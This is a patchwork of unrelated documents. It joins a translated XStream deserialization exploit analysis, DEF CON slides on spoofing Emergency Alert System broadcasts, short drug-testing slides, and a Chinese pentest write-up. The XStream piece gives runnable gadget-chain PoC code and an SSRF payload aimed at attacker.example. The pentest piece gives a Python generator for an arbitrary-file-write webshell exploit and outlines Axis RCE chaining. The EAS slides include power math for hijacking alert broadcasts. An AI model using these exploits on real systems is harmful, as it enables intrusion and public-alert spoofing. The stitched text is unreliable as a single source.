public String toString() {
this.get(); <------- point
return DatatypeConverterImpl._printBase64Binary(this.data, 0, this.dataLen);
}
public byte[] get() {
if (this.data == null) {
try {
ByteArrayOutputStreamEx baos = new ByteArrayOutputStreamEx(1024);
InputStream is = this.dataHandler.getDataSource().getInputStream(); <------- point
baos.readFrom(is);
is.close();
this.data = baos.getBuffer();
this.dataLen = baos.size();
} catch (IOException var3) {
this.dataLen = 0;
}
}
return this.data;
}
URLDataSource.class
public InputStream getInputStream() throws IOException {
return this.url.openStream(); <------- point
}
Summary: the attacker hands crafted XML to the XStream component. The moment the data enters XStream, the component's own code lets the attacker poison the types of the Map's key/value pairs. Controlling the data types means controlling the code execution path, so the data flow becomes attacker-controlled and the attacker's goal is reached.
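For reference, the XML produced by the PoC below has roughly the following shape. Treat this as an approximate sketch only — the exact element names come from XStream's default aliases (see the advisory in the references for the verbatim payload), and the URL is a placeholder:

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='javax.activation.URLDataSource'>
            <url>http://attacker.example/internal</url>
          </dataSource>
        </dataHandler>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
  </entry>
</map>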
Reverse analysis
Since the XStream project published PoC code for this issue, once I finished debugging I started wondering: if I were the one hunting this bug, how would I construct the PoC?
What is certain first is that the trigger class NativeString is held inside a Map, so start by defining one:
Map map = new HashMap();
The trigger class NativeString contains a Base64Data object and a URLDataSource object, and the Base64Data object wraps the URLDataSource, so define them as follows:
Base64Data base64Data = new Base64Data();
javax.activation.URLDataSource urlDataSource = new javax.activation.URLDataSource(new URL("http://127.0.0.1:1337/internal"));
DataSourceStreamingDataHandler handler = new DataSourceStreamingDataHandler(urlDataSource);
base64Data.set(handler);
Finally, instantiate the NativeString object and put the Base64Data object inside it:
Class nativeString_Class1 = Class.forName("jdk.nashorn.internal.objects.NativeString");
Constructor objCons = Object.class.getDeclaredConstructor(new Class[0]);
objCons.setAccessible(true);
Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(nativeString_Class1, objCons);
sc.setAccessible(true);
Object nativeString_Object = sc.newInstance(new Object[0]);
Field nativeStringValueField = nativeString_Object.getClass().getDeclaredField("value");
nativeStringValueField.setAccessible(true);
nativeStringValueField.set(nativeString_Object, base64Data);
Finally, put the NativeString object into the Map:
Map map = new HashMap();
map.put(nativeString_Object, nativeString_Object);
map.put(nativeString_Object, nativeString_Object);
The complete code is therefore:
Base64Data base64Data = new Base64Data();
javax.activation.URLDataSource urlDataSource = new javax.activation.URLDataSource(new URL("http://127.0.0.1:1337/internal"));
DataSourceStreamingDataHandler handler = new DataSourceStreamingDataHandler(urlDataSource);
base64Data.set(handler);
Class nativeString_Class1 = Class.forName("jdk.nashorn.internal.objects.NativeString");
Constructor objCons = Object.class.getDeclaredConstructor(new Class[0]);
objCons.setAccessible(true);
Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(nativeString_Class1, objCons);
sc.setAccessible(true);
Object nativeString_Object = sc.newInstance(new Object[0]);
Field nativeStringValueField = nativeString_Object.getClass().getDeclaredField("value");
nativeStringValueField.setAccessible(true);
nativeStringValueField.set(nativeString_Object, base64Data);
Map map = new HashMap();
map.put(nativeString_Object, nativeString_Object);
map.put(nativeString_Object, nativeString_Object);
XStream xStream = new XStream();
String test = xStream.toXML(map);
System.out.println(
test
);
It is worth noting that the newConstructorForSerialization method makes it possible to reflectively instantiate a class that has no constructor, or whose constructor is private.
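A self-contained sketch of that trick (the Locked class here is made up for illustration; this works on JDK 8, where ReflectionFactory lives in sun.reflect):

import java.lang.reflect.Constructor;
import sun.reflect.ReflectionFactory;

class Locked {
    private Locked() { throw new IllegalStateException("never called"); }
}

public class NoCtorDemo {
    public static void main(String[] args) throws Exception {
        Constructor<Object> objCtor = Object.class.getDeclaredConstructor();
        Constructor<?> c = ReflectionFactory.getReflectionFactory()
                .newConstructorForSerialization(Locked.class, objCtor);
        c.setAccessible(true);
        Object o = c.newInstance();        // the private constructor is bypassed entirely
        System.out.println(o.getClass());  // class Locked
    }
}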
III. Arbitrary file deletion — CVE-2020-26259
This vulnerability is also triggered through NativeString: the XML poisons the type of the InputStream, so that when the subsequent XStream code path reaches is.close(), the deletion fires.
public byte[] get() {
if (this.data == null) {
try {
ByteArrayOutputStreamEx baos = new ByteArrayOutputStreamEx(1024);
InputStream is = this.dataHandler.getDataSource().getInputStream();
baos.readFrom(is);
is.close(); <------- sink
this.data = baos.getBuffer();
this.dataLen = baos.size();
} catch (IOException var3) {
this.dataLen = 0;
}
}
return this.data;
}
By poisoning the type of Base64Data.get()'s InputStream is into com.sun.xml.internal.ws.util.ReadAllStream$FileStream, the trigger completes the moment is.close() executes.
private static class FileStream extends InputStream {
@Nullable
private File tempFile;
@Nullable
private FileInputStream fin;
private FileStream() {
}
void readAll(InputStream in) throws IOException {
this.tempFile = File.createTempFile("jaxws", ".bin");
FileOutputStream fileOut = new FileOutputStream(this.tempFile);
try {
byte[] buf = new byte[8192];
int len;
while((len = in.read(buf)) != -1) {
fileOut.write(buf, 0, len);
}
} finally {
fileOut.close();
}
this.fin = new FileInputStream(this.tempFile);
}
public int read() throws IOException {
return this.fin != null ? this.fin.read() : -1;
}
public int read(byte[] b, int off, int sz) throws IOException {
return this.fin != null ? this.fin.read(b, off, sz) : -1;
}
public void close() throws IOException {
if (this.fin != null) {
this.fin.close();
}
if (this.tempFile != null) {
boolean success = this.tempFile.delete(); <------- sink
if (!success) {
ReadAllStream.LOGGER.log(Level.INFO, "File {0} could not be deleted", this.tempFile);
}
}
}
}
IV. Remote code execution — CVE-2020-26217
This chain is still triggered through NativeString; it is just considerably longer, so take it step by step.
First poison the DataHandler's type to com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource, and in the Base64Data.get() method poison InputStream is to java.io.SequenceInputStream.
Because is is now a java.io.SequenceInputStream, inside the ByteArrayOutputStreamEx.readFrom() method:
ByteArrayOutputStreamEx.class
public void readFrom(InputStream is) throws IOException {
while(true) {
if (this.count == this.buf.length) {
byte[] data = new byte[this.buf.length * 2];
System.arraycopy(this.buf, 0, data, 0, this.buf.length);
this.buf = data;
}
int sz = is.read(this.buf, this.count, this.buf.length - this.count); <------- point
if (sz < 0) {
return;
}
this.count += sz;
}
}
readFrom() ends up invoking the java.io.SequenceInputStream.read() method:
SequenceInputStream.class
public int read(byte b[], int off, int len) throws IOException {
if (in == null) {
return -1;
} else if (b == null) {
throw new NullPointerException();
} else if (off < 0 || len < 0 || len > b.length - off) {
throw new IndexOutOfBoundsException();
} else if (len == 0) {
return 0;
}
int n = in.read(b, off, len);
if (n <= 0) {
nextStream(); <------- point
return read(b, off, len);
}
return n;
}
final void nextStream() throws IOException {
if (in != null) {
in.close();
}
if (e.hasMoreElements()) {
in = (InputStream) e.nextElement(); <------- point
if (in == null)
throw new NullPointerException();
}
else in = null;
}
javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator$Type.class
public Object nextElement() {
switch (type) {
case KEYS: return iterator.next().getKey(); <------- point
case ELEMENTS: return iterator.next().getValue();
default: return null;
}
}
FilterIterator.class
public T next() {
if (next == null) {
throw new NoSuchElementException();
}
T o = next;
advance(); <------- point
return o;
}
ServiceRegistry.class
private void advance() {
while (iter.hasNext()) {
T elt = iter.next();
if (filter.filter(elt)) { <------- sink
next = elt;
return;
}
}
next = null;
}
The full call stack for this chain is given here (the original screenshot did not survive extraction):
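A reconstruction from the excerpts above:

HashMap.put -> hash -> NativeString.hashCode -> getStringValue
  -> Base64Data.toString -> Base64Data.get
    -> XmlDataSource.getInputStream (poisoned to SequenceInputStream)
    -> ByteArrayOutputStreamEx.readFrom
      -> SequenceInputStream.read -> nextStream
        -> MultiUIDefaults$MultiUIDefaultsEnumerator.nextElement
          -> FilterIterator.next -> advance
            -> ServiceRegistry: filter.filter(elt)   <- sink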
An interesting detail of this bug is the outer-class alias: as the reflection error below shows, ArrayList$Itr has no field literally named outer-class.
Exception in thread "main" java.lang.NoSuchFieldException: outer-class
at java.lang.Class.getDeclaredField(Class.java:2057)
at XstreamEXP.main(XstreamEXP.java:147)
Reflection does, however, reveal an inner-class field named this$0 among the iterator's fields:
cursor
lastRet
expectedModCount
this$0
XStream maps this this$0 inner-class field to an alias; the mapping is established by OuterClassMapper:
/*
* Copyright (C) 2005 Joe Walnes.
* Copyright (C) 2006, 2007, 2009, 2015 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
* style license a copy of which has been included with this distribution in
* the LICENSE.txt file.
*
* Created on 31. January 2005 by Joe Walnes
*/
package com.thoughtworks.xstream.mapper;
import java.lang.reflect.Field;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import com.thoughtworks.xstream.core.Caching;
/**
* Mapper that uses a more meaningful alias for the field in an inner class (this$0) that refers to the outer class.
*
* @author Joe Walnes
*/
public class OuterClassMapper extends MapperWrapper implements Caching {
private static final String[] EMPTY_NAMES = new String[0];
private final String alias;
private final Map innerFields;
public OuterClassMapper(Mapper wrapped) {
this(wrapped, "outer-class");
}
public OuterClassMapper(Mapper wrapped, String alias) {
super(wrapped);
this.alias = alias;
innerFields = Collections.synchronizedMap(new HashMap());
innerFields.put(Object.class.getName(), EMPTY_NAMES);
}
public String serializedMember(Class type, String memberName) {
if (memberName.startsWith("this$")) {
final String[] innerFieldNames = getInnerFieldNames(type);
for (int i = 0; i < innerFieldNames.length; ++i) {
if (innerFieldNames[i].equals(memberName)) {
return i == 0 ? alias : alias + '-' + i;
}
}
}
return super.serializedMember(type, memberName);
}
public String realMember(Class type, String serialized) {
if (serialized.startsWith(alias)) {
int idx = -1;
final int len = alias.length();
if (len == serialized.length()) {
idx = 0;
} else if (serialized.length() > len + 1 && serialized.charAt(len) == '-') {
idx = Integer.valueOf(serialized.substring(len + 1)).intValue();
}
if (idx >= 0) {
final String[] innerFieldNames = getInnerFieldNames(type);
if (idx < innerFieldNames.length) {
return innerFieldNames[idx];
}
}
}
return super.realMember(type, serialized);
}
private String[] getInnerFieldNames(final Class type) {
String[] innerFieldNames = (String[])innerFields.get(type.getName());
if (innerFieldNames == null) {
innerFieldNames = getInnerFieldNames(type.getSuperclass());
Field[] declaredFields = type.getDeclaredFields();
for (int i = 0; i < declaredFields.length; i++) {
final Field field = declaredFields[i];
if (field.getName().startsWith("this$")) {
String[] temp = new String[innerFieldNames.length+1];
System.arraycopy(innerFieldNames, 0, temp, 0, innerFieldNames.length);
innerFieldNames = temp;
innerFieldNames[innerFieldNames.length - 1] = field.getName();
}
}
innerFields.put(type.getName(), innerFieldNames);
}
return innerFieldNames;
}
public void flushCache() {
innerFields.keySet().retainAll(Collections.singletonList(Object.class.getName()));
}
}
This explains where the outer-class tag comes from.
Summary:
Hunting this class of vulnerability takes a great deal of time. The security issues that appear in components like this all come down to achieving code execution purely by delivering data.
Reference:
http://xstream.10960.n7.nabble.com/How-to-remove-the-quot-outer-class-quot-tags-td5105.html
https://x-stream.github.io/javadoc/com/thoughtworks/xstream/mapper/OuterClassMapper.html
http://x-stream.github.io/CVE-2020-26258.html
http://x-stream.github.io/converters.html
https://x-stream.github.io/CVE-2020-26259.html
https://x-stream.github.io/CVE-2020-26217.html
https://x-stream.github.io/security.html | pdf |
FluX on: E.A.S.
(Emergency Alert System)
Presented By:
Matt Krick, “DCFluX”
Chief Engineer, New West Broadcasting Systems, Inc.
DEF CON 16
Las Vegas, NV
Track 2, 12:00-12:50, Saturday, August 9, 2008
WARNING:
Shut down all transmitters with active
microphones in the room.
Do not re-transmit ‘Hot’ audio.
Saturday Night Live, TV Funhouse, Fun With Real Audio ©1997 by NBC, Inc.
About the Author
• Matt Krick
• “DCFluX”
• Video Editor
• Broadcast Engineer
– 1998 to Present
• K3MK
– Licensed to
Transmit, 1994 to
Present
Video Advantage ©2002 by Media Concepts, Inc.
Warning Systems
1. CONELRAD
2. EBS
3. EAS
4. EAS: The Next Generation
1. CONtrol of ELectromagnetic RADiation
• 1951 - 1963
• All FM, TV and most AM stations sign-off
• Some AM stations required to broadcast
on 640 kHz or 1240 kHz
• All radios marked with CONELRAD
indicators on frequency dials
• Carrier on and off in 5 second intervals
– 1000 Hz alert tone for 20 - 25 seconds
1. CONtrol of ELectromagnetic RADiation
Photo by: Trevor Paglen
Department of Geography, University of California at Berkeley
1. CONtrol of ELectromagnetic RADiation
• CONELRAD Stress Test
– Transmitter power supply failure
– Local electrical substation failure
– Transmitter output network failure
– Transmitter carrier tube failure
– Transmitter modulator tube failure
• 1963 - 1997
• Introduction of ‘Two-Tone’ alert
– 853 & 960 Hz for 20 - 25 seconds
• Required 24 / 7 manned stations to
relay alerts
2. Emergency Broadcast System
2. Emergency Broadcast System
• EBS Stress Test
– Transmitter power supply failure
– Local electrical substation failure
– Transmitter modulator tube failure
3. Emergency Alert System
• 1997 - Present (1994)
• Administered by FEMA, FCC & NOAA
• Introduction of “SAME” encoded digital
message headers
– EAS uses 853 & 960 Hz Alert Tone
– SAME uses 1050 Hz Alert Tone
• Fully automated
3. Emergency Alert System
• Emergency Action Notification (EAN)
• Emergency Action Termination (EAT)
• National Information Center (NIC)
• National Periodic Test (NPT)
• NOAA Weather Alerts
• AMBER Alert (CAE)
• Local Emergencies
3. Emergency Alert System
• Participating Stations
– (-AM), (-FM), (-TV), (-DT)
– Class A TV (-CA)
– LPTV (-LP) if originating
– LPFM (-LP) if originating
– Cable TV
– Satellite DBS TV (National Only)
– XM, Sirius Satellite Radio (National Only)
* FCC Rules, Part 11.11
3. Emergency Alert System
• Non Participating Stations
– Sign off during alert
• Exempt Stations
– LPTV Translators
– LPFM Translators
* FCC Rules, Part 11.11, Part 11.19
Harris / SAGE EAS ENDEC
• AMD 80C188
• ADSP-2115
• 6 Receivers
• 6 Com Ports
• AFSK Encode
• AFSK Decode
• Computer I/O
http://www.broadcast.harris.com/support/sage/
EAS Protocol
Header
(3 Times)
Attention
Signal
EOM
(3 Times)
[PREAMBLE]
ZCZC-
ORG-
EEE-
PSSCCC
+TTTT-
JJJHHMM-
LLLLLLLL-
1 sec. pause
Message
853 & 960 Hz
8 - 25 sec.
Transmission
of audio,
video or text
messages
120 sec.
1 sec. pause
[PREAMBLE]
NNNN
1 sec. pause
* FCC Rules, Part 11.31(c), Part 11.33(a)(3)
[PREAMBLE]
This is a consecutive string of bits
(sixteen bytes of AB hexadecimal [8
bit byte 10101011]) sent to clear the
system, set AGC and set
asynchronous decoder clocking
cycles. The preamble must be
transmitted before each header and
End Of Message code.
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
ZCZC-
This is the identifier, sent as ASCII
characters ZCZC to indicate the start
of ASCII code.
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
ORG-
This is the Originator code and
indicates who originally initiated the
activation of the EAS.
EAN - Emergency Action Network
PEP - Primary Entry Point System
CIV - Civil authorities
WXR - National Weather Service
EAS - EAS Participant
* FCC Rules, Part 11.31(c), Part 11.31(d)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
EEE-
This is the Event code and indicates
the nature of the EAS activation. The
Event codes must be compatible
with the codes used by the NWS
Weather Radio Specific Area
Message Encoder (WRSAME).
EAN - Emergency Action Notification
EAT - Emergency Action Termination
* FCC Rules, Part 11.31(c), Part 11.31(e)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
PSSCCC
This is the Location code and indicates
the geographic area affected by the
EAS alert. There may be up to 31
Location codes in an EAS alert.
P defines County Subdivisions
SS defines State
CCC defines Individual Counties or
Cities
* FCC Rules, Part 11.31(c), Part 11.31(f)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
+TTTT-
This indicates the valid time period of a
message in 15 minute segments up
to one hour and then in 30 minute
segments beyond one hour; i.e.,
+0015, +0030, +0045, +0100, +0430
and +0600. Up to +9930.
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
JJJHHMM-
This is the day in Julian Calendar days
(JJJ) of the year and the time in
hours and minutes (HHMM) when
the message was initially released
by the originator using 24 hour
Universal Coordinated Time (UTC).
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
LLLLLLLL-
This is the identification of the EAS
Participant, NWS office, etc.,
transmitting or retransmitting the
message. These codes will be
automatically affixed to all outgoing
messages by the EAS encoder.
Use WOPR/JR, not WOPR-JR
* FCC Rules, Part 11.31(c), Part 11.31(3)(b)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
NNNN
This is the End of Message (EOM)
code sent as a string of four ASCII N
characters.
* FCC Rules, Part 11.31(c)
[PREAMBLE]NNNN
Example EAN
[PREAMBLE]
ZCZC-
PEP- (Primary Entry Point)
EAN- (Emergency Action Notification)
011000 (All of District of Columbia)
+2400- (Valid for 24 Hours)
2220000- (Day 222 00:00 HRS)
POTUS -
* FCC Rules, Part 11.31(c)
Modulation Standards
                    EAS *            BELL 202    BELL 103
Technique           AFSK             AFSK        AFSK
Baud Rate           520.83 BPS       1200 BPS    300 BPS
Mark Tone           2083.3 Hz        1200 Hz     1270 Hz (2225)
Space Tone          1562.5 Hz        2200 Hz     1070 Hz (2025)
Spacing Time        1.92 mS          0.833 mS    3.333 mS
Characters          7 bit ASCII      ASCII       ASCII
Attention Signal    853 and 960 Hz   None        None
Serial Format       8, N, 0          Any         Any
* FCC Rules, Part 11.31(a)(1)
Crystal Division Ratios
            853 and 960 Hz     2083.3 Hz   1562.5 Hz   1.92 mS   520.83 BPS
4.0 MHz     4689 and 4167      1920        2560        7680      7680
16.0 MHz    18757 and 16667    7680        10240       30720     30720
20.0 MHz    23447 and 20833    9600        12800       38400     38400
Byonics TinyTrak4
• ATMEGA644P
• 20 MHz Clock
• TX Control
• AFSK Encode
• AFSK Decode
• Computer I/O
• Optional LCD
http://www.byonics.com/tinytrak4/
Local Station Monitoring
SAGE ENDEC
National
Weather
Service
LP2
LP1
Local Primary 1 (LP1) Monitoring
SAGE ENDEC
State
PBS
National
Weather
Service
Local
Sheriff
LP2
Army
National
Guard
National
Warning
Center
Check your local listings
EAS plans contain guidelines which must
be followed to activate the EAS.
The plans include the EAS header codes
and messages that will be transmitted by
key EAS sources.
State and local plans also contain unique
methods of EAS message distribution.
* FCC Rules, Part 11.21
http://www.fcc.gov/pshs/services/eas/chairs.htm
National Primary, Tier 1
• 34 NP Tier 1 stations
– Diesel backup generator, 30 days fuel
– Landline, Satellite and HF radio
connectivity to FEMA operation centers
– Special EAS ENDEC with unique codes
– Located just outside of major city area
– Fallout shelter with on-site food
– Special lightning protection
National Primary, Tier 2
• 3 PEP Tier 2 stations
– All Tier 1 requirements except fallout
shelter
• 24 additional Tier 2 stations planned
National Primary, Tier 3
• Direct EAS link from FEMA to Public
Radio satellite network
• Direct EAS link from FEMA to XM
Radio satellite network
– XM Radio receivers being added to all
Tier 1 and 2 stations
• No special provisions like Tier 1 & 2
FM Capture Effect
• Signal =>15 dB captures receiver,
>20 dB preferred
• <15 dB of separation and signals
‘Fight’
• AM and SSB Signals ‘Mix’
Total Power Output
           AM                      FM                   TV                    VHF
Class A    10kW–50kW (+77 dBmW)    <= 6kW (+68 dBmW)    <= 150kW (+82 dBmW)   100W (+50 dBmW)
Class B    250W–50kW (+77 dBmW)    <= 50kW (+77 dBmW)   N/A                   <= 500W (+57 dBmW)
Class C    250W – 1kW (+60 dBmW)   <= 100kW (+80 dBmW)  <= 5MW (+97 dBmW)     1000W (+60 dBmW)
Class D    250W–50kW (+77 dBmW)    10W (+40 dBmW)       <= 150kW (+82 dBmW)   N/A
Free Space Attenuation
             AM      FM       TV       VHF
1 Mile       36 dB   76 dB    92 dB    80 dB
2 Miles      42 dB   82 dB    98 dB    86 dB
4 Miles      50 dB   88 dB    104 dB   92 dB
8 Miles      56 dB   94 dB    110 dB   98 dB
16 Miles     62 dB   100 dB   116 dB   104 dB
32 Miles     68 dB   106 dB   122 dB   110 dB
64 Miles     74 dB   112 dB   128 dB   116 dB
128 Miles    80 dB   118 dB   134 dB   122 dB
Subcarrier Power Output
N/A
N/A
-20 dB ????
N/A
RDS
N/A
N/A
-6 dB
N/A
SC1, SC2
N/A
N/A
0 dB
-12 dB
0 dB
AM
-10 dB
0 dB
0 dB
Main Audio
N/A
N/A
-3 dB
-20 dB
FM
-20 dB
N/A
PRO
-13 dB
N/A
SAP
-10 dB
N/A
Stereo
N/A
N/A
IBOC
TV
VHF
Average Receiver Sensitivity
              AM       FM       TV       VHF
Main Audio    -70 dB   -70 dB   -70 dB   -117 dB
VHF Attack Math
• VHF Class A Station (+50 dBm)
• 16 Miles (-104 dB)
• 3 Element Yagi (+6 dB)
• No Subcarrier
50 - 104 + 6 + 0 = -48 dB
-48 dB + 20 dB = -28 dB
VHF Attack Math
• 100W VHF Mobile Radio (+50 dBm)
• 1 Mile (-80 dB)
• 3 Element Yagi (+6 dB)
• Magnet Mount (+2 dB)
• No Subcarrier
50 - 80 + 6 + 2 + 0 = -22 dB
Taking Over
Message
Transmission
Profit!
Header and
Alert Tones
Audio Message
Less Than 120 Sec.
Message
Termination
Location
High ERP
Transmitter
????
Message
Repeats
Message
Logged
Vanned *
* FCC Rules, Part 73.1217, Parts 1.80 - 1.95
• 2007 - ????
• Introduction of “CAP”
– Common Alerting Protocol
– Provision for audio, video and text
– Geographic targeting
– Digital encryption and signature
• 180 Days to implement
• Delayed by Homeland Security
– Don’t expect it for 3 years
4. EAS: The Next Generation
* Executive Order 13407, 06/28/2006
• Pilot Programs
– DEAS (Digital EAS)
– GTAS (Geographical Targeted Alerting
System)
– WARN (Web Alert & Relay Network)
4. EAS: The Next Generation
FluX on: E.A.S.
(Emergency Alert System)
Questions?
[email protected] | pdf |
The Anatomy of Drug Testing
Legal Stuffs
● Scheduling
The purpose
● Schedule I
No medical use/Highly addictive
● Schedule II
Some medical application/Highly addictive
● Schedules III / IV
Legal Stuffs (cont.)
● The DOT
● COC
● Securing the location
● BAT
● COC
● Police vs. Hospitals/Collection sites
Methodologies
● EIA and ELISA
● Spectrophotometry
● Chemiluminescence
● GC/MS (Gas Chromatography/
Mass Spectrophotometry)
● Breathalyzer
Sample types
● Hair
● Urine
● Blood
● Stool
Meconium
● Breath
● Body tissues/fluids
Commonly Tested Drugs
(legal)
● Amphetamines
● TCAs (anti-depressants)
● Oxycodone
● Barbiturates
● Benzodiazepines
● Salicylate
● Acetaminophen
Commonly Tested Drugs
(illicit)
● Cocaine
● Methamphetamines
● MDMA (ecstasy)
● Opiates
● PCP
● THC
Uncommonly Tested Drugs
● LSD
● Psilocybin (Mushrooms)
● DMT
● Mescaline
● Peyote
● Nitrous Oxide
Putting it all together! | pdf |
Author: 远海@websecuritys.cn
0x01: Preface — I've been busy studying lately, so I haven't paid much attention to security. This is a record of a penetration test against one of my own school's systems, performed with the corresponding authorization. The generic vulnerability, which affects other organizations, was submitted to an SRC platform some time ago, and the vendor has released a patch.
0x02: Information gathering — The target is mainly a payment platform that went live only recently; testing began after obtaining authorization from a school teacher.
Software vendor: `xx软件开发有限公司/xxsoft/xxxx.com.cn`
Development language: `Java`
Framework: `St2` (Struts 2)
Because the system had only just gone live, single sign-on was not wired up yet, so I couldn't log in through SSO, and brute-forcing the admin password went nowhere.
I turned to collecting source code — white-box is, after all, the most direct approach. There are roughly three ways to find it:
1. Baidu net-disk
2. Xianyu second-hand market (some sellers who deploy such third-party systems may have copies; you have to ask)
3. Backups left on other sites running the same system
Baidu net-disk and Xianyu eat a lot of time and mostly come down to keyword intuition; both routes have been picked over by others, so I didn't waste time there (I did check later — nothing). First I fingerprinted the system and used fofa to collect sites running the same software.
Then I ran them all through Yujian (御剑). The dictionary:
/ROOT.7z
/ROOT.rar
/ROOT.tar
/ROOT.tar.gz
/ROOT.war
/ROOT.zip
/web.tar
/web.tar.gz
/web.rar
One thing worth noting: in many cases Tomcat hosts several applications in different directories, with ROOT holding only a few simple redirect files. When scanning multi-application sites, replace ROOT with the directory the application actually lives in, e.g.:
/pay/index.jsp --> /pay/ --> pay.war
This whole approach is pure luck — and it turned up nothing.
0x03: A vulnerable component
With backups a dead end, the only option left was known historical vulnerabilities. I fed the URL list into a scanner I wrote (first a directory scan, then verification based on the directories found)
and discovered officeserver.jsp under the ticket module. Visiting it returns:
DBSTEP V3.0 0 14 0 请使⽤Post⽅法 ("please use the POST method")
This is the typical fingerprint of a certain office-conversion component. It ships with a SAVEASHTML method by default, and an attacker can craft a special packet to get an arbitrary file write. The protocol is Base64-encoded by default, and the whole trick lies in constructing the packet; the original article had a diagram of the format (admittedly hard to read even for the author).
Explanation:
For details see the StreamToMsg method in DbStep.jar; briefly: the first 64 bytes of the packet are configuration that tells the backend how to read the rest, i.e. offsets 0-63. Bytes 0:15 are assigned to the variable FVersion, 16:31 to BodySize, 32:47 to ErrorSize, and 48:63 to FFileSize. Apart from FVersion, these fields may only contain digits, each stating how many bytes of the corresponding content to read. Taking BodySize as an example, a value of 114 means: skip the first 64 bytes of the packet and read the next 114 bytes; those 114 bytes are assigned to FMsgText. Parameters are then pulled out of FMsgText, each separated by \n\t, and so on.
With the packet format understood, it was time to write a generator script. The component's default SAVEASHTML method stores the FFileSize-delimited content into a file — an arbitrary file write:
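A sketch of the on-wire layout just described (the field widths are 16 bytes each; the sizes shown here are hypothetical):

offset 0                16        32        48        64
       |DBSTEP V3.0     |114      |0        |6        |<114 bytes of message body><6 bytes of file content>
        FVersion         BodySize  ErrorSize FFileSize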
else if (mOption.equalsIgnoreCase("SAVEASHTML")) {   // convert the OFFICE document to an HTML page (comments reconstructed from mojibake)
    mHtmlName = MsgObj.GetMsgByName("HTMLNAME");     // get the output file name
    mDirectory = MsgObj.GetMsgByName("DIRECTORY");   // get the target directory
    MsgObj.MsgTextClear();
    if (mDirectory.trim().equalsIgnoreCase("")) {
        mFilePath = mFilePath + "\\HTML";
    }
    else {
        mFilePath = mFilePath + "\\HTML\\" + mDirectory;
    }
    MsgObj.MakeDirectory(mFilePath);                 // create the directory path
    if (MsgObj.MsgFileSave(mFilePath + "\\" + mHtmlName)) {   // save the HTML file
        MsgObj.MsgError("");                         // clear the error message
        MsgObj.SetMsgByName("STATUS", "...");        // set the status message ("HTML conversion succeeded"; original string was mojibake)
    }
    else {
        MsgObj.MsgError("...");                      // "HTML conversion failed" (reconstructed)
    }
    MsgObj.MsgFileClear();
}
When the target directory does not exist, it is created automatically. The mHtmlName that MsgFileSave appends is attacker-controlled, so the write can attempt directory traversal. The generator script:
body = f"""DBSTEP=REJTVEVQ OPTION=U0FWRUFTSFRNTA== HTMLNAME=Ly4uLy4uLzEuanNw DIRECTORY=Lw== LOCALFILE=MQ==""".replace(' ', '\n').strip()
coente = """hello1"""
fileContent = f'''
{coente}
'''.replace("\n", "").strip()
payload = "DBSTEP V3.0 "
bodysieze = str(len(body))
filesize = str(len(fileContent))
payload += str(int(bodysieze) + 3) + ' ' * (16 - len(bodysieze)) + '0' + ' ' * 15 + filesize + ' ' * (16 - len(filesize)) + body + fileContent
FVersion=payload[0:15]
print("version:",FVersion)
Body=payload[16:31]
print("BodySize:",Body)
Error=payload[32:47]
print("ErrorSize:",Error)
File=payload[48:63]
print("FileSize:",File)
print(payload)
I sent the payload to the endpoint with Postman. Perhaps because things had gone too smoothly, it returned a "file save failed" message, which left me puzzled. After some exploration I found that the save succeeds whenever FileName contains no /../ traversal sequence. Since mFilePath resolves to the application's root directory, the file should land under the HTML directory — but requesting it returned a 404, proving nothing was written where expected.

0x04: How file writes differ between Linux and Windows
After consulting 忍酱 I learned the cause: the target runs Linux, and on Linux \\ is treated as part of a file name, while FileOutputStream throws immediately when the target directory does not exist.
Demo: on a write, the missing \HTML\test directory gets created, but the directory component of the final write path is named \HTML\test\\ — and no directory named HTML\test\\ exists, so the write fails.
Without the /../ traversal, the file would end up stored under the literal name \\HTML\\test\\1.txt, which is not what we want either.
Solution:
Knowing why the write fails, the fix suggests itself: since the method can create directories, why not pre-create a directory literally named \HTML\test\\ and write into it afterwards? When mDirectory is non-empty, the final storage path is built by concatenation and then created, so we can experiment with mDirectory: append \\\ to the directory name to make sure the directory we expect actually gets created.
Practice: I wrote a demo simulating the final write flow; adding several \ to path2 did create the expected \HTML\test\\ directory (the real environment actually needs three).
With the directory in place, retry the write — because of the concatenation, one \ has to be dropped from the directory this time — and the write succeeds: traversal complete.
The PoC for the target system therefore has two steps: 1. create the directory, 2. write the file.
Retrying the write:
Success!
0x05: The end is also a beginning — With the webshell in hand, I took the working PoC to the actual target system — and found it has no ticket module at all. All that work for nothing?
Luckily the system I had already compromised contained the PAY module, which I could download and audit. A round of auditing turned up no obvious primitives: the system has no file-upload endpoint, and every SQL-injection candidate sanitizes input
uniformly through org.apache.commons.lang.StringEscapeUtils.escapeSql.
That makes further exploitation hard. But web.xml revealed that the application uses AXIS, version 1.4, with remote access enabled.
Axis 1.4 has a known remote command execution issue: a malicious method can be added to the web services, leading to command execution.
See https://paper.seebug.org/1489/#13-axis for details.
Exploiting it requires an SSRF vulnerability to chain with. Searching the existing code for controllable points turned up no usable SSRF — the URLs are all fixed.
Then I remembered the MySQL JDBC XXE (CVE-2021-2471) I had recently reproduced — XXE can send HTTP requests too. (I normally don't pay much attention to this bug class.)
